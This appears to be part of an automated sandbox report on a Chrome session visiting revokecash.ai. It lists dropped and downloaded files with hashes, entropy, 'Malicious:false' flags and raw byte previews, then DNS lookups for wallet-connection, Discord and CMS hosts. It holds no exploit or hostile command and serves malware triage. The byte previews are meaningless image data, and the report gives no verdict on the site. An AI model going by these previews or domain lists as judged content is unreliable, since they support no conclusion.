                                                                          Preview:.PNG........IHDR................M....pHYs............... .IDATx..utU.....zw........8!X.A....h)R\K.:..B)m..R......8.7.{.z.\s......q..4...u..<.../...'..._..._..W'q.......S....i.8u._.....7g8.>.-.o.r.>......;...{.o........8.;w.............^....p..8.I.^.....(.O?...?.._.......~..?.r.?]........z..~.|.?_.._.\..t...W...+..2.._q...z.....+..z.W...kt..+..z..~..k....7......._..y......q..n....[.p..m..n..m..-....o...z|....w..6=..wp..]....kt..;w.._.....7.....o......;?..w...\..~......?......~..........?......AWz....Oz,]9......O...OU.N..w.k.p',.'Aw...:s.$..k..s...'=p.-.G.M.]f.L.]1....d.......\...\.~S......u..n.^..#.......g.N.N....sG......!S...+..C'].......J..S`.........\...t*x.t6..../.w..8..w..]....+...}(..8..]c...p7.0..w..-\.%]o2|....jg.rw,.......UN..U.UNx......n.U.O.N.M.K....).........l>Q......w...!p......X../..lU...o.:.&.j...m.Vo..UN.L...M.M.VQ.~kK..).X.b.....(....tf...../......q'.<.o.....p.*.i,...KU....r._.....Z..].y.7.<.Vo....jl....d.J.wG..|5.r...
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JPEG image data, progressive, precision 8, 2047x859, components 3
                                                                          Category:dropped
                                                                          Size (bytes):232425
                                                                          Entropy (8bit):7.986852076558832
                                                                          Encrypted:false
                                                                          SSDEEP:6144:ylH1TLO0gslntQPGiLk+t+AZWgCrZhSe8q:yt1fNptspxHT2Ee/
                                                                          MD5:ACABCBC9305D2204B6AC96FF83B21BAE
                                                                          SHA1:7F9E2B31F67641EF79D748CEAF7C38C98A05EC23
                                                                          SHA-256:E39E98B31AA1763CAE81119AC5EB6F993136675D7E864FA306D0F8F1B4F0C098
                                                                          SHA-512:185DAA895FCEC4FF635A6F6BCF005116729E62D0EB11AB610E3D2C665D4EF8E19914C9AFB133AA9AAF0F6B2C2F50CFCA1846E111EE2B061EC0FF8E6ACF8FB239
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......[...."..............................................................................z&........+rr..AM...X.. . .<...T..Q..P.....l%.H...(.....B....2....2..F.......CT0,..$Y.AT.#jp....Qt.2a.......B.,Y".l.7D....&[[&@.".*$.i..8.....Dl.a..Y6..."lTI...BY&J)....Ja.9....,I....E..F...w).*$.I...$.....%)$..CdatR.........+"H+.K..K....$[tB..aJ.n 0.D....F.TT....)Ds.RjLJh....B...P.....J&..v..U.).*n2....R..%.6.:.Ik .)*. .g.LtBq.P..8L..V2.X.*`"A..5.B.%8.P...vVI1...RcT.&.h..,,v.p..I"....6.3..."...$..B.Th..ic8....0.I,R%@.....j.j....I.....+.v[.F$)+i..m29....40dF...IK.....eF.A.$..lP..&E..BJ2e). %.D'.X.K..Z...!. &0`V.%VWq..N....QH....Q..!..I...lT0.L..S.E....@.FH..;RA*..D...c.9Td.`k..wZ...J"5`..BpA....J2..'....J2.......L.;$........F.b.X..u% .!."1,i....'.`4.k....H.I0k.7..]...j.,D1P.)!5$.jQ......3....%$.(....Z..6P..J4.p...W..`&..`i.\.6$F.....j
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (1409)
                                                                          Category:downloaded
                                                                          Size (bytes):1457
                                                                          Entropy (8bit):4.958515522044324
                                                                          Encrypted:false
                                                                          SSDEEP:24:y0DhfwhMqM4JVAQipzRQWfzRapAR4R3fcgNfpgZQzRgmbXrf9f:nV0ApduW7gucFmZO2mDrFf
                                                                          MD5:B6B1E50DF965EE9497A6353817CB8695
                                                                          SHA1:50E6775EB4F3735FACCB49A7668F6BF01A8A4873
                                                                          SHA-256:524B42D356687C0C36D622CFF4E04B977D31B6B726A78CBB17F2C6F652C60B49
                                                                          SHA-512:2E72FD7CF3C3867CACE17EAE8A5F62645A250631BC0C00D246E49414B46804BA4039A6CDCD275C35666B55ED8A0CEEF9D26B0EC18EB6EE9EE4D0F908E710A75C
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://revokecash.ai/_css/56d1f5034e1e3936.css
                                                                          Preview:.tippy-box[data-animation=fade][data-state=hidden]{opacity:0}[data-tippy-root]{max-width:calc(100vw - 10px)}.tippy-box{position:relative;background-color:#333;color:#fff;border-radius:4px;font-size:14px;line-height:1.4;white-space:normal;outline:0;transition-property:transform,visibility,opacity}.tippy-box[data-placement^=top]>.tippy-arrow{bottom:0}.tippy-box[data-placement^=top]>.tippy-arrow:before{bottom:-7px;left:0;border-width:8px 8px 0;border-top-color:initial;transform-origin:center top}.tippy-box[data-placement^=bottom]>.tippy-arrow{top:0}.tippy-box[data-placement^=bottom]>.tippy-arrow:before{top:-7px;left:0;border-width:0 8px 8px;border-bottom-color:initial;transform-origin:center bottom}.tippy-box[data-placement^=left]>.tippy-arrow{right:0}.tippy-box[data-placement^=left]>.tippy-arrow:before{border-width:8px 0 8px 8px;border-left-color:initial;right:-7px;transform-origin:center left}.tippy-box[data-placement^=right]>.tippy-arrow{left:0}.tippy-box[data-placement^=right]>.tippy-
                                                                          No static file info
                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Dec 10, 2023 17:44:11.511579990 CET192.168.2.51.1.1.10x60e3Standard query (0)clients2.google.comA (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:11.511812925 CET192.168.2.51.1.1.10xf246Standard query (0)clients2.google.com65IN (0x0001)false
                                                                          Dec 10, 2023 17:44:11.512347937 CET192.168.2.51.1.1.10x5c17Standard query (0)accounts.google.comA (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:11.512566090 CET192.168.2.51.1.1.10xc5dbStandard query (0)accounts.google.com65IN (0x0001)false
                                                                          Dec 10, 2023 17:44:12.861569881 CET192.168.2.51.1.1.10x784Standard query (0)ctrk.klclick.comA (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:12.862042904 CET192.168.2.51.1.1.10x9412Standard query (0)ctrk.klclick.com65IN (0x0001)false
                                                                          Dec 10, 2023 17:44:13.559572935 CET192.168.2.51.1.1.10xc806Standard query (0)revokecash.aiA (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:13.562717915 CET192.168.2.51.1.1.10x8f5dStandard query (0)revokecash.ai65IN (0x0001)false
                                                                          Dec 10, 2023 17:44:15.316970110 CET192.168.2.51.1.1.10xbd03Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:15.317358017 CET192.168.2.51.1.1.10x7e20Standard query (0)code.jquery.com65IN (0x0001)false
                                                                          Dec 10, 2023 17:44:16.043102026 CET192.168.2.51.1.1.10x369cStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:16.043303967 CET192.168.2.51.1.1.10x663eStandard query (0)www.google.com65IN (0x0001)false
                                                                          Dec 10, 2023 17:44:16.633590937 CET192.168.2.51.1.1.10x93feStandard query (0)revokecash.aiA (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:16.634131908 CET192.168.2.51.1.1.10x66f4Standard query (0)revokecash.ai65IN (0x0001)false
                                                                          Dec 10, 2023 17:44:17.645273924 CET192.168.2.51.1.1.10x518eStandard query (0)unpkg.comA (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:17.645880938 CET192.168.2.51.1.1.10x1469Standard query (0)unpkg.com65IN (0x0001)false
                                                                          Dec 10, 2023 17:44:22.136091948 CET192.168.2.51.1.1.10x71f3Standard query (0)explorer-api.walletconnect.comA (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:22.136665106 CET192.168.2.51.1.1.10x3a4dStandard query (0)explorer-api.walletconnect.com65IN (0x0001)false
                                                                          Dec 10, 2023 17:44:22.172144890 CET192.168.2.51.1.1.10x5ccaStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:22.175405025 CET192.168.2.51.1.1.10x9588Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                          Dec 10, 2023 17:44:23.109749079 CET192.168.2.51.1.1.10x944fStandard query (0)relay.walletconnect.comA (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:23.110168934 CET192.168.2.51.1.1.10x7f72Standard query (0)relay.walletconnect.com65IN (0x0001)false
                                                                          Dec 10, 2023 17:44:23.214430094 CET192.168.2.51.1.1.10x6328Standard query (0)explorer-api.walletconnect.comA (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:23.214903116 CET192.168.2.51.1.1.10xd07eStandard query (0)explorer-api.walletconnect.com65IN (0x0001)false
                                                                          Dec 10, 2023 17:44:24.409914017 CET192.168.2.51.1.1.10x80e1Standard query (0)explorer-api.walletconnect.comA (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:24.755918026 CET192.168.2.51.1.1.10xed22Standard query (0)relay.walletconnect.orgA (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:24.756325960 CET192.168.2.51.1.1.10x65edStandard query (0)relay.walletconnect.org65IN (0x0001)false
                                                                          Dec 10, 2023 17:44:37.813266993 CET192.168.2.51.1.1.10x48dStandard query (0)boringsecurity.comA (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:37.814713955 CET192.168.2.51.1.1.10xbd6fStandard query (0)boringsecurity.com65IN (0x0001)false
                                                                          Dec 10, 2023 17:44:38.022767067 CET192.168.2.51.1.1.10xe8f6Standard query (0)boringsecurity.com65IN (0x0001)false
                                                                          Dec 10, 2023 17:44:39.103408098 CET192.168.2.51.1.1.10xebb9Standard query (0)boringsecurity.comA (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:49.901711941 CET192.168.2.51.1.1.10x999cStandard query (0)boringsecurity.comA (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:49.902010918 CET192.168.2.51.1.1.10x9182Standard query (0)boringsecurity.com65IN (0x0001)false
                                                                          Dec 10, 2023 17:44:50.078556061 CET192.168.2.51.1.1.10x1111Standard query (0)boringsecurity.com65IN (0x0001)false
                                                                          Dec 10, 2023 17:44:51.175405025 CET192.168.2.51.1.1.10xdc52Standard query (0)cms.boringsecurity.comA (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:51.175950050 CET192.168.2.51.1.1.10xa3e0Standard query (0)cms.boringsecurity.com65IN (0x0001)false
                                                                          Dec 10, 2023 17:44:51.325572968 CET192.168.2.51.1.1.10x58dfStandard query (0)cms.boringsecurity.com65IN (0x0001)false
                                                                          Dec 10, 2023 17:44:52.237797976 CET192.168.2.51.1.1.10xb9b6Standard query (0)relay.walletconnect.comA (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:52.238220930 CET192.168.2.51.1.1.10xd272Standard query (0)relay.walletconnect.com65IN (0x0001)false
                                                                          Dec 10, 2023 17:44:52.569045067 CET192.168.2.51.1.1.10x7002Standard query (0)www.walletlink.orgA (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:52.569360018 CET192.168.2.51.1.1.10x4342Standard query (0)www.walletlink.org65IN (0x0001)false
                                                                          Dec 10, 2023 17:44:53.667805910 CET192.168.2.51.1.1.10xe15aStandard query (0)relay.walletconnect.orgA (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:53.668303967 CET192.168.2.51.1.1.10xb2dStandard query (0)relay.walletconnect.org65IN (0x0001)false
                                                                          Dec 10, 2023 17:44:53.680627108 CET192.168.2.51.1.1.10x5a86Standard query (0)cms.boringsecurity.comA (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:53.681260109 CET192.168.2.51.1.1.10xcafdStandard query (0)cms.boringsecurity.com65IN (0x0001)false
                                                                          Dec 10, 2023 17:44:53.859551907 CET192.168.2.51.1.1.10xbddfStandard query (0)cms.boringsecurity.com65IN (0x0001)false
                                                                          Dec 10, 2023 17:44:59.849422932 CET192.168.2.51.1.1.10x9c36Standard query (0)boring-security-cms.s3.amazonaws.comA (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:59.849728107 CET192.168.2.51.1.1.10xc902Standard query (0)boring-security-cms.s3.amazonaws.com65IN (0x0001)false
                                                                          Dec 10, 2023 17:45:00.893354893 CET192.168.2.51.1.1.10x12fdStandard query (0)boring-security-cms.s3.amazonaws.comA (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:45:00.893640041 CET192.168.2.51.1.1.10xbf33Standard query (0)boring-security-cms.s3.amazonaws.com65IN (0x0001)false
                                                                          Dec 10, 2023 17:45:05.793405056 CET192.168.2.51.1.1.10xfa16Standard query (0)discord.ggA (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:45:05.796817064 CET192.168.2.51.1.1.10xc17bStandard query (0)discord.gg65IN (0x0001)false
                                                                          Dec 10, 2023 17:45:06.491092920 CET192.168.2.51.1.1.10xc9edStandard query (0)discord.comA (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:45:06.492434978 CET192.168.2.51.1.1.10xaabdStandard query (0)discord.com65IN (0x0001)false
                                                                          Dec 10, 2023 17:45:21.451014042 CET192.168.2.51.1.1.10xa73cStandard query (0)discord.comA (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:45:21.451313019 CET192.168.2.51.1.1.10xf6edStandard query (0)discord.com65IN (0x0001)false
                                                                          Dec 10, 2023 17:45:25.325357914 CET192.168.2.51.1.1.10x6babStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:45:25.325540066 CET192.168.2.51.1.1.10xcf90Standard query (0)cdn.discordapp.com65IN (0x0001)false
                                                                          Dec 10, 2023 17:45:26.042417049 CET192.168.2.51.1.1.10x2a03Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:45:26.042762041 CET192.168.2.51.1.1.10x27bbStandard query (0)cdn.discordapp.com65IN (0x0001)false
                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Dec 10, 2023 17:44:11.637052059 CET1.1.1.1192.168.2.50x60e3No error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:11.637052059 CET1.1.1.1192.168.2.50x60e3No error (0)clients.l.google.com192.178.50.46A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:11.637352943 CET1.1.1.1192.168.2.50x5c17No error (0)accounts.google.com192.178.50.45A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:11.637388945 CET1.1.1.1192.168.2.50xf246No error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:13.001360893 CET1.1.1.1192.168.2.50x784No error (0)ctrk.klclick.comd319s8zqhriqme.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:13.001360893 CET1.1.1.1192.168.2.50x784No error (0)d319s8zqhriqme.cloudfront.net18.66.255.33A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:13.001360893 CET1.1.1.1192.168.2.50x784No error (0)d319s8zqhriqme.cloudfront.net18.66.255.74A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:13.001360893 CET1.1.1.1192.168.2.50x784No error (0)d319s8zqhriqme.cloudfront.net18.66.255.59A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:13.001360893 CET1.1.1.1192.168.2.50x784No error (0)d319s8zqhriqme.cloudfront.net18.66.255.22A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:13.005322933 CET1.1.1.1192.168.2.50x9412No error (0)ctrk.klclick.comd319s8zqhriqme.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:13.899775028 CET1.1.1.1192.168.2.50x8f5dNo error (0)revokecash.ai65IN (0x0001)false
                                                                          Dec 10, 2023 17:44:13.907556057 CET1.1.1.1192.168.2.50xc806No error (0)revokecash.ai104.21.1.228A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:13.907556057 CET1.1.1.1192.168.2.50xc806No error (0)revokecash.ai172.67.152.105A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:15.442265987 CET1.1.1.1192.168.2.50xbd03No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:15.442265987 CET1.1.1.1192.168.2.50xbd03No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:15.442265987 CET1.1.1.1192.168.2.50xbd03No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:15.442265987 CET1.1.1.1192.168.2.50xbd03No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:16.168472052 CET1.1.1.1192.168.2.50x369cNo error (0)www.google.com142.250.217.228A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:16.168644905 CET1.1.1.1192.168.2.50x663eNo error (0)www.google.com65IN (0x0001)false
                                                                          Dec 10, 2023 17:44:16.877923965 CET1.1.1.1192.168.2.50x93feNo error (0)revokecash.ai172.67.152.105A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:16.877923965 CET1.1.1.1192.168.2.50x93feNo error (0)revokecash.ai104.21.1.228A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:16.898917913 CET1.1.1.1192.168.2.50x66f4No error (0)revokecash.ai65IN (0x0001)false
                                                                          Dec 10, 2023 17:44:17.770221949 CET1.1.1.1192.168.2.50x518eNo error (0)unpkg.com104.16.123.175A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:17.770221949 CET1.1.1.1192.168.2.50x518eNo error (0)unpkg.com104.16.122.175A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:17.770221949 CET1.1.1.1192.168.2.50x518eNo error (0)unpkg.com104.16.126.175A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:17.770221949 CET1.1.1.1192.168.2.50x518eNo error (0)unpkg.com104.16.125.175A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:17.770221949 CET1.1.1.1192.168.2.50x518eNo error (0)unpkg.com104.16.124.175A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:17.770649910 CET1.1.1.1192.168.2.50x1469No error (0)unpkg.com65IN (0x0001)false
                                                                          Dec 10, 2023 17:44:22.267322063 CET1.1.1.1192.168.2.50x3a4dNo error (0)explorer-api.walletconnect.com65IN (0x0001)false
                                                                          Dec 10, 2023 17:44:22.267345905 CET1.1.1.1192.168.2.50x71f3No error (0)explorer-api.walletconnect.com104.18.27.46A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:22.267345905 CET1.1.1.1192.168.2.50x71f3No error (0)explorer-api.walletconnect.com104.18.26.46A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:22.299567938 CET1.1.1.1192.168.2.50x5ccaNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:23.236615896 CET1.1.1.1192.168.2.50x944fNo error (0)relay.walletconnect.com52.205.234.209A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:23.236615896 CET1.1.1.1192.168.2.50x944fNo error (0)relay.walletconnect.com3.232.180.138A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:23.339689016 CET1.1.1.1192.168.2.50x6328No error (0)explorer-api.walletconnect.com104.18.27.46A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:23.339689016 CET1.1.1.1192.168.2.50x6328No error (0)explorer-api.walletconnect.com104.18.26.46A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:23.340745926 CET1.1.1.1192.168.2.50xd07eNo error (0)explorer-api.walletconnect.com65IN (0x0001)false
                                                                          Dec 10, 2023 17:44:24.536673069 CET1.1.1.1192.168.2.50x80e1No error (0)explorer-api.walletconnect.com104.18.27.46A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:24.536673069 CET1.1.1.1192.168.2.50x80e1No error (0)explorer-api.walletconnect.com104.18.26.46A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:24.881279945 CET1.1.1.1192.168.2.50xed22No error (0)relay.walletconnect.org18.141.17.51A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:24.881279945 CET1.1.1.1192.168.2.50xed22No error (0)relay.walletconnect.org3.1.159.199A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:24.881279945 CET1.1.1.1192.168.2.50xed22No error (0)relay.walletconnect.org13.250.153.115A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:38.022125959 CET1.1.1.1192.168.2.50xbd6fServer failure (2)boringsecurity.comnonenone65IN (0x0001)false
                                                                          Dec 10, 2023 17:44:38.198240042 CET1.1.1.1192.168.2.50xe8f6Server failure (2)boringsecurity.comnonenone65IN (0x0001)false
                                                                          Dec 10, 2023 17:44:39.345000029 CET1.1.1.1192.168.2.50xebb9No error (0)boringsecurity.comapex-loadbalancer.netlify.comCNAME (Canonical name)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:39.345000029 CET1.1.1.1192.168.2.50xebb9No error (0)apex-loadbalancer.netlify.com75.2.60.5A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:39.345000029 CET1.1.1.1192.168.2.50xebb9No error (0)apex-loadbalancer.netlify.com99.83.231.61A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:50.077938080 CET1.1.1.1192.168.2.50x9182Server failure (2)boringsecurity.comnonenone65IN (0x0001)false
                                                                          Dec 10, 2023 17:44:50.115339041 CET1.1.1.1192.168.2.50x999cNo error (0)boringsecurity.comapex-loadbalancer.netlify.comCNAME (Canonical name)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:50.115339041 CET1.1.1.1192.168.2.50x999cNo error (0)apex-loadbalancer.netlify.com75.2.60.5A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:50.115339041 CET1.1.1.1192.168.2.50x999cNo error (0)apex-loadbalancer.netlify.com99.83.231.61A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:51.324996948 CET1.1.1.1192.168.2.50xa3e0Server failure (2)cms.boringsecurity.comnonenone65IN (0x0001)false
                                                                          Dec 10, 2023 17:44:51.325539112 CET1.1.1.1192.168.2.50xdc52No error (0)cms.boringsecurity.com23.92.19.144A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:51.474431992 CET1.1.1.1192.168.2.50x58dfServer failure (2)cms.boringsecurity.comnonenone65IN (0x0001)false
                                                                          Dec 10, 2023 17:44:52.368330956 CET1.1.1.1192.168.2.50xb9b6No error (0)relay.walletconnect.com3.213.155.136A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:52.368330956 CET1.1.1.1192.168.2.50xb9b6No error (0)relay.walletconnect.com54.221.204.16A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:52.695780993 CET1.1.1.1192.168.2.50x7002No error (0)www.walletlink.org104.18.37.8A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:52.695780993 CET1.1.1.1192.168.2.50x7002No error (0)www.walletlink.org172.64.150.248A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:53.793590069 CET1.1.1.1192.168.2.50xe15aNo error (0)relay.walletconnect.org13.250.153.115A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:53.793590069 CET1.1.1.1192.168.2.50xe15aNo error (0)relay.walletconnect.org3.1.159.199A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:53.793590069 CET1.1.1.1192.168.2.50xe15aNo error (0)relay.walletconnect.org18.141.17.51A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:53.828855991 CET1.1.1.1192.168.2.50x5a86No error (0)cms.boringsecurity.com23.92.19.144A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:53.858185053 CET1.1.1.1192.168.2.50xcafdServer failure (2)cms.boringsecurity.comnonenone65IN (0x0001)false
                                                                          Dec 10, 2023 17:44:53.986243963 CET1.1.1.1192.168.2.50xbddfServer failure (2)cms.boringsecurity.comnonenone65IN (0x0001)false
                                                                          Dec 10, 2023 17:44:59.997082949 CET1.1.1.1192.168.2.50x9c36No error (0)boring-security-cms.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:59.997082949 CET1.1.1.1192.168.2.50x9c36No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:59.997082949 CET1.1.1.1192.168.2.50x9c36No error (0)s3-w.us-east-1.amazonaws.com3.5.25.121A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:59.997082949 CET1.1.1.1192.168.2.50x9c36No error (0)s3-w.us-east-1.amazonaws.com54.231.224.1A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:59.997082949 CET1.1.1.1192.168.2.50x9c36No error (0)s3-w.us-east-1.amazonaws.com16.182.103.169A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:59.997082949 CET1.1.1.1192.168.2.50x9c36No error (0)s3-w.us-east-1.amazonaws.com16.182.107.41A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:59.997082949 CET1.1.1.1192.168.2.50x9c36No error (0)s3-w.us-east-1.amazonaws.com52.217.140.241A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:59.997082949 CET1.1.1.1192.168.2.50x9c36No error (0)s3-w.us-east-1.amazonaws.com54.231.134.105A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:59.997082949 CET1.1.1.1192.168.2.50x9c36No error (0)s3-w.us-east-1.amazonaws.com52.216.211.49A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:44:59.997082949 CET1.1.1.1192.168.2.50x9c36No error (0)s3-w.us-east-1.amazonaws.com52.216.50.225A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:45:00.054651022 CET1.1.1.1192.168.2.50xc902No error (0)boring-security-cms.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                          Dec 10, 2023 17:45:00.054651022 CET1.1.1.1192.168.2.50xc902No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                          Dec 10, 2023 17:45:01.036475897 CET1.1.1.1192.168.2.50xbf33No error (0)boring-security-cms.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                          Dec 10, 2023 17:45:01.036475897 CET1.1.1.1192.168.2.50xbf33No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                          Dec 10, 2023 17:45:01.053590059 CET1.1.1.1192.168.2.50x12fdNo error (0)boring-security-cms.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                          Dec 10, 2023 17:45:01.053590059 CET1.1.1.1192.168.2.50x12fdNo error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                          Dec 10, 2023 17:45:01.053590059 CET1.1.1.1192.168.2.50x12fdNo error (0)s3-w.us-east-1.amazonaws.com52.217.229.121A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:45:01.053590059 CET1.1.1.1192.168.2.50x12fdNo error (0)s3-w.us-east-1.amazonaws.com52.217.164.105A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:45:01.053590059 CET1.1.1.1192.168.2.50x12fdNo error (0)s3-w.us-east-1.amazonaws.com54.231.223.41A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:45:01.053590059 CET1.1.1.1192.168.2.50x12fdNo error (0)s3-w.us-east-1.amazonaws.com52.217.202.153A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:45:01.053590059 CET1.1.1.1192.168.2.50x12fdNo error (0)s3-w.us-east-1.amazonaws.com16.182.64.41A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:45:01.053590059 CET1.1.1.1192.168.2.50x12fdNo error (0)s3-w.us-east-1.amazonaws.com52.216.36.65A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:45:01.053590059 CET1.1.1.1192.168.2.50x12fdNo error (0)s3-w.us-east-1.amazonaws.com52.217.227.81A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:45:01.053590059 CET1.1.1.1192.168.2.50x12fdNo error (0)s3-w.us-east-1.amazonaws.com52.217.115.121A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:45:05.918764114 CET1.1.1.1192.168.2.50xfa16No error (0)discord.gg162.159.134.234A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:45:05.918764114 CET1.1.1.1192.168.2.50xfa16No error (0)discord.gg162.159.136.234A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:45:05.918764114 CET1.1.1.1192.168.2.50xfa16No error (0)discord.gg162.159.133.234A (IP address)IN (0x0001)false
                                                                          Dec 10, 2023 17:45:05.918764114 CET1.1.1.1192.168.2.50xfa16No error (0)discord.gg162.159.130.234A (IP address)IN (0x0001)false
